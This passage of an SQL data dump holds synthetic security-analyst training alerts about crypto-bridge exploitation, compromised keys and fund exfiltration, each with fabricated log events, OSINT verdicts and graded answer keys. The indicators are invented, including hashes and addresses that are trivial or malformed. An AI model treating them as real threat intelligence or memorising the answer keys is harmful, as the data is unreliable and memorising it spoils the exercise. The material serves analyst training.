activity.\"}},{\"id\":\"artifact_5\",\"type\":\"email\",\"value\":\"john.doe@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Email address of the implicated user in the organization.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:31:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 
BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:30:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:29:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"},{\"timestamp\":\"2026-02-01T20:28:22.690Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:20:35Z\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hash\\\":\\\"a1b2c3d4e5f67890123456789abcdef0123456789abcdef0123456789abcdef0\\\",\\\"mixer_address\\\":\\\"1MixerXYZ123456789abcdef\\\",\\\"exchange_domain\\\":\\\"cryptomixexchange.com\\\",\\\"user\\\":\\\"john.doe@example.com\\\",\\\"amount\\\":\\\"10 BTC\\\",\\\"malicious\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(999, 'Suspicious Smart Contract Interaction Detected', 'medium', 'Blockchain transaction logs', 'Anomalous interactions with the Wormhole bridge smart contract were detected, suggesting a potential exploitation of a signature verification vulnerability.', 'Initial Access', 'T1190', 1, 'new', NULL, '{\"transaction_id\":\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\",\"contract_address\":\"0xwormholebridge1234567890abcdef\",\"attacker_ip\":\"203.0.113.45\",\"source_ip\":\"192.168.1.100\",\"transaction_hash\":\"0xdeadbeef1234567890abcdef1234567890abcdef\",\"timestamp\":\"2023-10-01T12:34:56Z\",\"user\":\"0xvictimuser1234567890abcdef\",\"function_called\":\"verifySignature\",\"parameters\":{\"signature\":\"0xsuspicioussignature1234567890abcdef\",\"message\":\"0xmessagepayload1234567890abcdef\"}}', '2026-01-17 03:45:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous blockchain-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"0xdeadbeef1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"Blockchain Analysis\",\"verdict\":\"suspicious\",\"details\":\"Transaction hash associated with unusual smart contract interactions.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"0xvictimuser1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"internal\",\"details\":\"User account of interest.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.692Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"transaction_id\\\":\\\"0xabc1234def5678ghijk910lmnopqrs2345tuvwx\\\",\\\"contract_address\\\":\\\"0xwormholebridge1234567890abcdef\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"transaction_hash\\\":\\\"0xdeadbeef1234567890abcdef1234567890abcdef\\\",\\\"timestamp\\\":\\\"2023-10-01T12:34:56Z\\\",\\\"user\\\":\\\"0xvictimuser1234567890abcdef\\\",\\\"function_called\\\":\\\"verifySignature\\\",\\\"parameters\\\":{\\\"signature\\\":\\\"0xsuspicioussignature1234567890abcdef\\\",\\\"message\\\":\\\"0xmessagepayload1234567890abcdef\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1000, 'Exploitation of Signature Verification Vulnerability', 'high', 'Smart contract audit reports', 'An attacker successfully manipulated the smart contract by leveraging a signature verification vulnerability. This allowed unauthorized execution of transactions, moving large sums across the blockchain bridge.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event\":\"Unauthorized Transaction Execution\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"transaction_id\":\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\",\"affected_contract\":\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\",\"signature_method\":\"ECDSA\",\"vulnerability\":\"Improper Signature Validation\",\"malicious_file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"attacker123\"}', '2026-01-17 03:45:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous blockchain attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Asset\",\"verdict\":\"internal\",\"details\":\"Internal blockchain node handling transactions.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to tools used in blockchain exploitation.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"attacker123\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Logs\",\"verdict\":\"suspicious\",\"details\":\"Username linked with unauthorized access 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.693Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event\\\":\\\"Unauthorized Transaction Execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"transaction_id\\\":\\\"0x5abc3d2e9f3b6a8e7f9b2c8d3e4f6a1b\\\",\\\"affected_contract\\\":\\\"0xde0B295669a9FD93d5F28D9Ec85E40f4cb697BAe\\\",\\\"signature_method\\\":\\\"ECDSA\\\",\\\"vulnerability\\\":\\\"Improper Signature 
Validation\\\",\\\"malicious_file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"attacker123\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1001, 'Persistent Access via Compromised Keys', 'high', 'Cryptographic key monitoring tools', 'An attacker has maintained access to an exploited smart contract by using compromised cryptographic keys, leading to repeated unauthorized transactions.', 'Persistence', 'T1098 - Account Manipulation', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T02:15:30Z\",\"event_id\":\"crypto-access-00123\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"compromised_key_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"attacker_username\":\"attacker_user\",\"exploited_smart_contract\":\"0x9e564e1d1e334e123456790bcd1234567890abcd\",\"malicious_file\":\"malicious_keyfile.bin\",\"transaction_id\":\"tx1234567890abcdef\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-17 03:45:24', '2026-02-14 17:06:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDatabase\",\"verdict\":\"malicious\",\"details\":\"IP associated with known crypto-related attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareDatabase\",\"verdict\":\"malicious\",\"details\":\"Hash matches known compromised cryptographic keys.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_keyfile.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"FileReputationService\",\"verdict\":\"malicious\",\"details\":\"File used to maintain unauthorized 
access.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"Username associated with unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'EDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.694Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T02:15:30Z\\\",\\\"event_id\\\":\\\"crypto-access-00123\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"compromised_key_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_username\\\":\\\"attacker_user\\\",\\\"exploited_smart_contract\\\":\\\"0x9e564e1d1e334e123456790bcd1234567890abcd\\\",\\\"malicious_file\\\":\\\"malicious_keyfile.bin\\\",\\\"transaction_id\\\":\\\"tx1234567890abcdef\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1002, 'Funds Exfiltration and Bug Bounty Offer', 'critical', 'Cryptocurrency exchange monitoring', 'An attacker successfully siphoned off $325 million from the exchange. They have proposed a $10 million bug bounty offer, indicating a negotiation strategy for vulnerability disclosure.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"evt-123456789\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.15\",\"username\":\"attacker_user\",\"transaction_id\":\"txn-987654321\",\"exfiltrated_amount\":325000000,\"proposed_bounty\":10000000,\"exfil_method\":\"http\",\"malware_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"filename\":\"exploit_script.sh\"}', '2026-01-17 03:45:24', '2026-02-16 17:50:03', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server used for transaction processing.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in standard user lists.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used in financial exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exploit_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Incident 
Response\",\"verdict\":\"malicious\",\"details\":\"Script used in multiple exfiltration incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_id\\\":\\\"evt-123456789\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"transaction_id\\\":\\\"txn-987654321\\\",\\\"exfiltrated_amount\\\":325000000,\\\"proposed_bounty\\\":10000000,\\\"exfil_method\\\":\\\"http\\\",\\\"malware_hash\\\":\\\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\\\",\\\"filename\\\":\\\"exploit_script.sh\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.696Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 